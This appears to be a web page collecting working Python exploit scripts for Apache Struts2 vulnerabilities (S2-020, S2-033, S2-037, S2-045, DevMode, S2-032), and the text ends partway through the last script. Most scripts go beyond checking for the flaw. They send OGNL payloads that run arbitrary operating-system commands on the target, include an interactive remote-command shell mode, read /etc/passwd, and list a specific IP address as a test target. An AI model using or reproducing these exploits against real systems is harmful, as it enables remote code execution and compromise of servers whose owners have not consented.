Struts2 部分exp

020

# S2-020_POC.py
“`
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import argparse
from urlparse import urlparse, urlunparse, urljoin
import time
import requests as req
import traceback

class WavsPlugin():
def __init__(self, url):
self.url = url
self.banner = u”’\
# POC Name : Struts2 S2-020漏洞检测POC
# Author : CF_HB
# Date : 2016/06/02
# Refere : http://drops.wooyun.org/papers/1377
#用法: python S2-020_POC.py -url http://121.42.xxx.xxx:8081/xxx/xxx.action
#POC适用范围: Tomcat6.x,Tomcat7.x,Tomcat8.x 更低的5.x,4.x没有测试环境#
结果:
存在漏洞:
[Congratulations!!!]
http://121.42.xxx.xxx:8081/xxx/xxx.action is vulnerable S2-020.
浏览器访问验证-Windows目标:http://121.42.xxx.xxx:8081/xxx/S2020/explorer.exe
浏览器访问验证-Linux目标:http://121.42.xxx.xxx:8081/xxx//S2020/etc/passwd
不存在漏洞:
[sorry!!]
http://www.csu.wsu.cn/index.php is no vulnerable..
”’
def verity(self):
print self.banner
print “[Checking] “+self.url
ORG_URL = self.url
urlinfo = urlparse(ORG_URL)
tom8_check_url = urlunparse((urlinfo.scheme, urlinfo.netloc, ‘/’, ”, ”, ”))
tom6x7x_url_two = urlunparse((urlinfo.scheme, urlinfo.netloc, urlinfo.path.split(‘/’)[1], ”, ”, ”))
self.headers = {
‘Host’: urlinfo.hostname,
‘User-Agent’: ‘Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;)’,
‘Referer’: self.url,
‘banner’: ‘s2-020 poc from cf_hb.’
}
poc_tom8 = []
poc_win_tom6x7x = []
poc_linux_tom6x7x = []
# Tomcat 8.x Linux+Windows
poc_tom8.append(“?class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT”)
poc_tom8.append(“?class.classLoader.resources.context.parent.pipeline.first.prefix=S2020POC”)
poc_tom8.append(“?class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp”)
poc_tom8.append(“?class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=1”)
poc_tom8.append(‘?poc=<%out.write("This_Site_Is_Vulnerable_S2020");%>‘)
# Tomcat6.x and Tomcat 7.x – Windows
poc_win_tom6x7x.append(“?class.classLoader.resources.dirContext.aliases=/S2020=C://Windows/”)
# Tomcat6.x and Tomcat 7.x – Linux
poc_linux_tom6x7x.append(“?class.classLoader.resources.dirContext.aliases=/S2020=/”)
try:
for poc_add in poc_tom8:
poc_url = urljoin(ORG_URL, poc_add)
resp = req.get(poc_url, headers=self.headers, timeout=3)
time.sleep(1)
checkurl = urljoin(tom8_check_url, “S2020POC1.jsp”)
# tomcat写日志难以捉摸,为了避免漏掉,测试5次每次停顿1秒
# check 5 times
for i in range(0, 5):
resp = req.get(checkurl, headers=self.headers, timeout=3)
time.sleep(1)
if resp.status_code and “This_Site_Is_Vulnerable_S2020” in resp.content:
print “[Congratulations!!!]”
print “{url} is vulnerable S2-020.”.format(url=self.url)
return

# Check tomcat6.x and tomcat7.x – Windows
for poc_add in poc_win_tom6x7x:
poc_url = urljoin(ORG_URL, poc_add)
resp = req.get(poc_url, headers=self.headers, timeout=3)
time.sleep(1)
checkurl = tom6x7x_url_two+”/S2020/explorer.exe”
resp = req.head(checkurl, timeout=3)
if resp.status_code == 200:
size = resp.headers.get(‘Content-Length’)
fsize = int(size) / 1024
if fsize > 1: #检测文件大小是否大于1KB
print “[Congratulations!!!!!]”
print “{url} is vulnerable S2-020.”.format(url=self.url)
return
# Check tomcat6.x and tomcat7.x – Linux
for poc_add in poc_linux_tom6x7x:
poc_url = urljoin(ORG_URL, poc_add)
resp = req.get(poc_url, headers=self.headers, timeout=3)
time.sleep(1)
checkurl = tom6x7x_url_two+”/S2020/etc/passwd”
resp = req.get(checkurl, headers=self.headers, timeout=3)
if resp.status_code and (“/bin/bash” in resp.content or “root:x:0:0:root:/root” in resp.content):
self._report(ORG_URL)
return
print “[sorry!!]”
print “{url} is no vulnerable..”.format(url=self.url)
except Exception, e:
print “Failed to connection target, try again..”
return

if __name__ == ‘__main__’:
parser = argparse.ArgumentParser()
parser.add_argument(‘-url’, help=’the target url.’)
args = parser.parse_args()
args_dict = args.__dict__

try:
if not (args_dict[‘url’] == None):
url = args_dict[‘url’]
plg = WavsPlugin(url)
plg.verity()
else:
print parser.print_usage()
exit(0)
except Exception,e:
print parser.print_usage()
exit(-1)

“`
# S2-033_CmdToolExP.py
“`
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import argparse

banner = u”’\
# S2-033 CmdToolExP
# Author:CF_HB
# 时间:2016年6月7日
# 参考:http://zone.wooyun.org/content/27732
#使用说明:
# 1、检测
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -check yes
2、交互式执行命令
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -shell yes
3、执行一条命令:在无交互式环境或不方便查看回显数据时使用
python S2-033_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -command “net user ”
# ~$ id
# ======================================================
# uid=0(root) gid=0(root) groups=0(root)
#
# ======================================================
# ~$ pwd
# ======================================================
# /
# ======================================================
# ~$ q 退出

# ======================================================
”’
# PoC
s2033_poc = “/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908”
# CommandExP
cmd_exp = “/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=ShowMeCommand”
headers = {‘user-agent’: ‘Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0’,
‘Cookie’: ‘JSESSIONID=75C9ED1CD9345875BC5328D73DC76812’,
‘referer’: ‘http://www.baidu.com/’,
}

def verity(url):

try:
poc_url = url+s2033_poc
print “.”*len(url)
print “[checking] ” + url
print “.”*len(url)
s = requests.session()
res = s.post(poc_url, timeout=4)
if res.status_code == 200 and “290860253718” in res.content:
if len(res.content) <14: # maybe 12 length return True else: return False else: return False except Exception, e: print "Failed to connection target, try again.." return False def cmdTool(exp_url): get_url_exp = exp_url + cmd_exp while True: comm = raw_input("~$ ") if comm == "q": exit(0) temp_exp = get_url_exp.replace("ShowMeCommand", comm) try: print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 except: print "error,try again.." # 执行一句话命令 def ExecOneCmd(exp_url , command): try: get_url_exp = exp_url + cmd_exp temp_exp = get_url_exp.replace("ShowMeCommand", command) print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 return True except: return False if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.', required=True) parser.add_argument('-check', help='yes|no', required=False) parser.add_argument('-shell', help='get os shell (yes|no)', required=False) parser.add_argument('-command', help='one os command', required=False) args = parser.parse_args() args_dict = args.__dict__ try: print banner if not (args_dict['u'] == None): if not (args_dict['check'] == None): url = args_dict['u'] if args_dict['check'] == "yes": isvuln = verity(url) if isvuln: print "{url} is vulnerable S2-033.".format(url=url) exit(0) else: print "{url} is no vulnerable..".format(url=url) exit(0) if not (args_dict['shell'] == None): if args_dict['shell'] == "yes": url = args_dict['u'] cmdTool(url) exit(0) if not (args_dict['command'] == None): url = args_dict['u'] command = args_dict['command'] ExecOneCmd(url, command) exit(0) print parser.print_usage() except Exception,e: print parser.print_usage() exit(-1) ``` # S2-033_PoC.py ``` #!/usr/bin/env python # -*- coding:utf-8 -*- # S2-033 POC # Author: CF_HB # 时间:2016年6月6日 # 漏洞编号:CVE-2016-3087 (S2-033) # 漏洞详情:http://blog.nsfocus.net/apache-struts2-vulnerability-technical-analysis-protection-scheme-s2-033/ import requests import argparse banner = u'''\ # S2-033 POC # Author:CF_HB # 时间:2016年6月6日 #使用说明: # 1、检测 python S2-033_PoC.py -u http://xxx.xxx.xxx.xxx/xx/ ''' def verity(url): s2033_poc = "/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908" try: print banner poc_url = url+s2033_poc print "[checking] " + url s = requests.session() res = s.post(poc_url, timeout=4) if res.status_code == 200 and "290860253718" in res.content: if len(res.content) <14: # may be 12 length print "{url} is vulnerable S2-033.".format(url=url) else: print "{url} is not vulnerable..".format(url=url) else: print "{url} is not vulnerable..".format(url=url) except Exception, e: print "Failed to connection target, try again.." parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.') args = parser.parse_args() args_dict = args.__dict__ try: shellpath = None if not (args_dict['u'] == None): url = args_dict['u'] verity(url) except Exception,e: print parser.print_usage() exit(-1) ``` # S2-037_CmdToolExP.py ``` #!/usr/bin/env python # -*- coding:utf-8 -*- import requests import argparse banner = u'''\ # S2-037 CmdToolExP # Author:CF_HB # 时间:2016年6月15日 # 参考:https://mp.weixin.qq.com/s?__biz=MzAwNTYwMjM3Mw==&mid=2651680334&idx=1&sn=5c9adb02a1c11d9bbff3ffddb639d62f&scene=1&srcid=06155PRaQh7SaMEXd9Gm8hJz&key=18e81ac7415f67c47805fa13645fc0bfbfc346925f00cad995baf01c4d39f50db871ab4deb12eb91e46ff14b0570894a&ascene=0&uin=MTgyMDIxMTIw&devicetype=iMac+MacBookPro12%2C1+OSX+OSX+10.11.5+build(15F34)&version=11020201&pass_ticket=kA0Saphd78eTEUnR4OiUT95KlcsA12Avul8RmKbOClA%3D # 参考:http://zone.wooyun.org/content/27865 #使用说明: # 1、检测 python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -check yes 2、交互式执行命令 python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -shell yes 3、执行一条命令:在无交互式环境或不方便查看回显数据时使用 python S2-037_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xx/ -command "net user " # ~$ id # ====================================================== # uid=0(root) gid=0(root) groups=0(root) # # ====================================================== # ~$ pwd # ====================================================== # / # ====================================================== # ~$ q 退出 # ====================================================== ''' # PoC s2037_poc = "/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B" # # CommandExP cmd_exp = "/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=ShowMeCommand" headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'Cookie': 'JSESSIONID=75C9ED1CD9345875BC5328D73DC76812', 'referer': 'http://www.baidu.com/', } def verity(url): try: poc_url = url+s2037_poc print "."*len(url) print "[checking] " + url print "."*len(url) s = requests.session() res = s.post(poc_url, timeout=4) if res.status_code == 200 and "25F9E794323B453885F5181F1B624D0B" in res.content: if len(res.content) <40: # 34 length return True else: return False else: return False except Exception, e: print "Failed to connection target, try again.." return False def cmdTool(exp_url): get_url_exp = exp_url + cmd_exp while True: comm = raw_input("~$ ") if comm == "q": exit(0) temp_exp = get_url_exp.replace("ShowMeCommand", comm) try: print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 except: print "error,try again.." # 执行一句话命令 def ExecOneCmd(exp_url , command): try: get_url_exp = exp_url + cmd_exp temp_exp = get_url_exp.replace("ShowMeCommand", command) print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 return True except: return False if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.', required=True) parser.add_argument('-check', help='yes|no', required=False) parser.add_argument('-shell', help='get os shell (yes|no)', required=False) parser.add_argument('-command', help='one os command', required=False) args = parser.parse_args() args_dict = args.__dict__ try: print banner if not (args_dict['u'] == None): if not (args_dict['check'] == None): url = args_dict['u'] if args_dict['check'] == "yes": isvuln = verity(url) if isvuln: print "{url} is vulnerable S2-037.".format(url=url) exit(0) else: print "{url} is no vulnerable..".format(url=url) exit(0) if not (args_dict['shell'] == None): if args_dict['shell'] == "yes": url = args_dict['u'] cmdTool(url) exit(0) if not (args_dict['command'] == None): url = args_dict['u'] command = args_dict['command'] ExecOneCmd(url, command) exit(0) print parser.print_usage() except Exception,e: print parser.print_usage() exit(-1) ``` # S2-037_PoC.py ``` #!/usr/bin/env python # -*- coding:utf-8 -*- # S2-037 POC # Author: CF_HB # 来源:http://zone.wooyun.org/content/27865 # 时间:2016年6月15日 import requests import argparse banner = u'''\ # S2-037 POC # Author:CF_HB # 时间:2016年6月15日 #使用说明: # 1、检测 python S2-037_PoC.py -u http://xxx.xxx.xxx.xxx/xx/ ''' def verity(url): s2037_poc = "/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B" try: print banner poc_url = url+s2037_poc print "[checking] " + url s = requests.session() res = s.post(poc_url, timeout=4) if res.status_code == 200 and "25F9E794323B453885F5181F1B624D0B" in res.content: if len(res.content) <40: # may be 34 length print "{url} is vulnerable S2-037.".format(url=url) else: print "{url} is no vulnerable..".format(url=url) else: print "{url} is no vulnerable..".format(url=url) except Exception, e: print "Failed to connection target, try again.." parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.') args = parser.parse_args() args_dict = args.__dict__ try: shellpath = None if not (args_dict['u'] == None): url = args_dict['u'] verity(url) except Exception,e: print parser.print_usage() exit(-1) ``` # S2-045_poc_exp.py ``` #!/usr/bin/env python3 # coding=utf-8 # ***************************************************** # struts-pwn: Apache Struts CVE-2017-5638 Exploit # Author: # Mazin Ahmed
# This code is based on:
# https://www.exploit-db.com/exploits/41570/
# https://www.seebug.org/vuldb/ssvid-92746
# *****************************************************
import sys
import random
import requests
import argparse

# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass

if len(sys.argv) <= 1: print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') print('[*] Struts-PWN - @mazen160') print('\n%s -h for help.' % (sys.argv[0])) exit(0) parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="Check a single URL.", action='store') parser.add_argument("-l", "--list", dest="usedlist", help="Check a list of URLs.", action='store') parser.add_argument("-c", "--cmd", dest="cmd", help="Command to execute. (Default: id)", action='store', default='id') parser.add_argument("--check", dest="do_check", help="Check if a target is vulnerable.", action='store_true') args = parser.parse_args() url = args.url if args.url else None usedlist = args.usedlist if args.usedlist else None url = args.url if args.url else None cmd = args.cmd if args.cmd else None do_check = args.do_check if args.do_check else None def url_prepare(url): url = url.replace('#', '%23') url = url.replace(' ', '%20') if ('://' not in url): url = str('http') + str('://') + str(url) return(url) def exploit(url, cmd): url = url_prepare(url) print('\n[*] URL: %s' % (url)) print('[*] CMD: %s' % (cmd)) payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % cmd payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" headers = { # 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'Content-Type': str(payload), 'Accept': '*/*' } timeout = 3 try: proxy = {"http":"127.0.0.1:8080"} output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False,proxies=proxy).text except Exception as e: print("EXCEPTION::::--> ” + str(e))
output = ‘ERROR’
return(output)

def check(url):
url = url_prepare(url)
print(‘\n[*] URL: %s’ % (url))

random_string = ”.join(random.choice(‘abcdefghijklmnopqrstuvwxyz’) for i in range(7))

payload = “%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].”
payload += “addHeader(‘%s’,’%s’)}.multipart/form-data” % (random_string, random_string)
headers = {
# ‘User-Agent’: ‘struts-pwn (https://github.com/mazen160/struts-pwn)’,
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36’,
‘Content-Type’: str(payload),
‘Accept’: ‘*/*’
}

timeout = 3
try:
resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
result = True
else:
result = False
except Exception as e:
print(“EXCEPTION::::–> ” + str(e))
result = False
return(result)

def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
if url:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = ‘[*] Status: ‘
if result is True:
output += ‘Vulnerable!’
else:
output += ‘Not Affected.’
else:
output = exploit(url, cmd) # Exploit
print(output)

if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), ‘r’)
URLs_List = f_file.read().replace(‘\r’, ”).split(‘\n’)
try:
URLs_List.remove(”)
except ValueError:
pass
f_file.close()
except:
print(‘Error: There was an error in reading list file.’)
exit(1)
for url in URLs_List:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = ‘[*] Status: ‘
if result is True:
output += ‘Vulnerable!’
else:
output += ‘Not Affected.’
else:
output = exploit(url, cmd) # Exploit
print(output)

print(‘[%] Done.’)

if __name__ == ‘__main__’:
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
except KeyboardInterrupt:
print(‘\nKeyboardInterrupt Detected.’)
print(‘Exiting…’)
exit(0)
“`
# S2-DevMode_CmdToolExP.py
“`
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import requests
import argparse

banner = u”’\
# S2_DevMode_RCE CmdToolExP
# Author:CF_HB
# 时间:2016年7月14日
# 参考:http://zone.wooyun.org/content/28441
#使用说明:
# 1、检测
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -check yes
2、交互式执行命令
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -shell yes
3、执行一条命令:在无交互式环境或不方便查看回显数据时使用
python S2_DevMode_RCE_CmdToolExP.py -u http://xxx.xxx.xxx.xxx/xxxx.action -command “net user ”
# ~$ id
# ======================================================
# uid=0(root) gid=0(root) groups=0(root)
#
# ======================================================
# ~$ pwd
# ======================================================
# /
# ======================================================
# ~$ q 退出

# ======================================================
”’
# PoC
S2_DevMode_POC = “?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B”
#
# CommandExP
cmd_exp = “?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=ShowMeCommand”
headers = {‘user-agent’: ‘Mozilla/3.0 (Windows NT 4.3; WOW64; rv:15.0) Gecko/2102101 Firefox/45.0’,
‘Cookie’: ‘JSESSIONID=75C9ED1CD9345875BC5328D73DC76812’,
‘referer’: ‘http://www.baidu.com/’,
}

def verity(url):

try:
poc_url = url+S2_DevMode_POC
print “.”*len(url)
print “[checking] ” + url
print “.”*len(url)
s = requests.session()
res = s.post(poc_url, timeout=4)
if res.status_code == 200 and “25F9E794323B453885F5181F1B624D0B” in res.content:
if len(res.content) <40: # 34 length return True else: return False else: return False except Exception, e: print "Failed to connection target, try again.." return False def cmdTool(exp_url): get_url_exp = exp_url + cmd_exp while True: comm = raw_input("~$ ") if comm == "q": exit(0) temp_exp = get_url_exp.replace("ShowMeCommand", comm) try: print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 except: print "error,try again.." # 执行一句话命令 def ExecOneCmd(exp_url , command): try: get_url_exp = exp_url + cmd_exp temp_exp = get_url_exp.replace("ShowMeCommand", command) print "="*80 print "[Result]" print "_"*80 r = requests.get(temp_exp, headers=headers, timeout=5) resp = r.text.encode("utf-8") print resp print "="*80 return True except: return False if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.', required=True) parser.add_argument('-check', help='yes|no', required=False) parser.add_argument('-shell', help='get os shell (yes|no)', required=False) parser.add_argument('-command', help='one os command', required=False) args = parser.parse_args() args_dict = args.__dict__ try: # print banner if not (args_dict['u'] == None): if not (args_dict['check'] == None): url = args_dict['u'] if args_dict['check'] == "yes": isvuln = verity(url) if isvuln: print "{url} is vulnerable S2_DevMode_RCE.".format(url=url) exit(0) else: print "{url} is no vulnerable..".format(url=url) exit(0) if not (args_dict['shell'] == None): if args_dict['shell'] == "yes": url = args_dict['u'] cmdTool(url) exit(0) if not (args_dict['command'] == None): url = args_dict['u'] command = args_dict['command'] ExecOneCmd(url, command) exit(0) print parser.print_usage() except Exception,e: print parser.print_usage() exit(-1) ``` # S2DevMode_POC.py ``` #!/usr/bin/env python # -*- coding:utf-8 -*- # S2-DevMode POC # Author: CF_HB # 来源:http://zone.wooyun.org/content/28416 # 时间:2016年7月14日 import requests import argparse banner = u'''\ # S2-DevMode POC # Author:CF_HB # 时间:2016年7月14日 #使用说明: # 1、检测 python S2-DevMode_POC.py -u http://xxx.xxx.xxx.xxx/xxxxx.action ''' def verity(url): S2_DevMode_POC = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B" try: print banner poc_url = url+S2_DevMode_POC print "[checking] " + url s = requests.session() res = s.post(poc_url, timeout=4) if res.status_code == 200 and "25F9E794323B453885F5181F1B624D0B" in res.content: if len(res.content) <40: # may be 34 length print "{url} is vulnerable S2_DevMode_RCE.".format(url=url) else: print "{url} is no vulnerable..".format(url=url) else: print "{url} is no vulnerable..".format(url=url) except Exception, e: print "Failed to connection target, try again.." parser = argparse.ArgumentParser() parser.add_argument('-u', help='the target url.') args = parser.parse_args() args_dict = args.__dict__ try: shellpath = None if not (args_dict['u'] == None): url = args_dict['u'] verity(url) except Exception,e: print parser.print_usage() exit(-1) ``` # S2032V1.0.py ``` #!-*- coding:utf-8 -*- import sys import requests import re # Author: CF_HB # CreatedTime: 2016-04-28 # 测试地址: http://122.224.255.238/admin/adminlogin.action # 接收命令执行结果40K的数据,可以自己替换: 40960 ######################################################################################### # 自定义设置区域# headers = {'user-agent':'Mozilla/2.0 (Windows NT 3.1; rv:42.0) Gecko/200101 Firefox/12.0', 'Cookie':'JSESSIONID=75C9ED1CD9345SAWA328D2SA6812', 'SOAPAction':'""', 'Safety-Testing':'By CF_HB', } proxy = {'http': 'http://127.0.0.1:8080'} timeout = 5 # 用于POC鉴别是否存在漏洞 hashKey = "This_site_has_s2-032_vulnerabilities" # 使用说明 notice = u''' S2-032辅助工具V1.0 # Author: CF_HB # CreatedTime: 2016-04-28 # 漏洞编号:(CVE-2016-3081) #V1.0功能说明: # 1) 漏洞检查 # 2) 漏洞命令执行 # 3) POC和EXP可以自定义添加 # 4) 暂只支持GET方式提交payload #To Do: # 1) 支持POST类型提交 # 2) 支持IP+PORT(http://114.114.114.114:8080/)类型的自动化检测 # 3) 随时补充POC和EXP #用法说明如下: # 1) 检查目标是否存在S2-032漏洞用法 # usage: python S2032.py http://www.test.com/login.action check # 2) 一句话命令执行 # usage: python S2032.py http://www.test.com/login.action "net user" # 3) 交互式命令执行(反弹shell下,或者终端下面使用.) # usage: python S2032.py http://www.test.com/login.action cmdtool #####声明: # 本脚本仅用于安全测试,请勿用于违法犯罪! ''' ########################################################################################### S2032POC = [] # POC集合 # 在POC的判断点替换成:This_site_has_s2-032_vulnerabilities S2032POC.append("?test=This_site_has_s2-032_vulnerabilities&method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23str%3d%23parameters.test,%23res%3d@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23res.print(%23str[0]),%23res.flush(),%23res.close") S2032POC.append("?method:%23_memberAccess%3d%40ognl%2eOgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java%2elang%2eRuntime%40getRuntime%28%29%2eexec%28%23parameters.command[0]%29%2egetInputStream%28%29%2c%23b%3dnew%20java%2eio%2eInputStreamReader%28%23a%29%2c%23c%3dnew%20java%2eio%2eBufferedReader%28%23b%29%2c%23d%3dnew%20char%5b40960%5d%2c%23c%2eread%28%23d%29%2c%23kxlzx%3d%40org%2eapache%2estruts2%2eServletActionContext%40getResponse%28%29%2egetWriter%28%29%2c%23kxlzx%2eprintln%28%23d%29%2c%23kxlzx%2eclose&command=echo This_site_has_s2-032_vulnerabilities") S2032EXP = [] # command_exp集合 # 新的EXP在执行命令的点设置为:GiveMeCommand,然后像下面的方式添加即可 # nsf_exp S2032EXP.append("?method:%23_memberAccess%3d%40ognl%2eOgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java%2elang%2eRuntime%40getRuntime%28%29%2eexec%28%23parameters.command[0]%29%2egetInputStream%28%29%2c%23b%3dnew%20java%2eio%2eInputStreamReader%28%23a%29%2c%23c%3dnew%20java%2eio%2eBufferedReader%28%23b%29%2c%23d%3dnew%20char%5b40960%5d%2c%23c%2eread%28%23d%29%2c%23kxlzx%3d%40org%2eapache%2estruts2%2eServletActionContext%40getResponse%28%29%2egetWriter%28%29%2c%23kxlzx%2eprintln%28%23d%29%2c%23kxlzx%2eclose&command=GiveMeCommand") # shack2_exp S2032EXP.append("?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=GiveMeCommand&pp=\\\\A&ppp=%20&encoding=UTF-8") 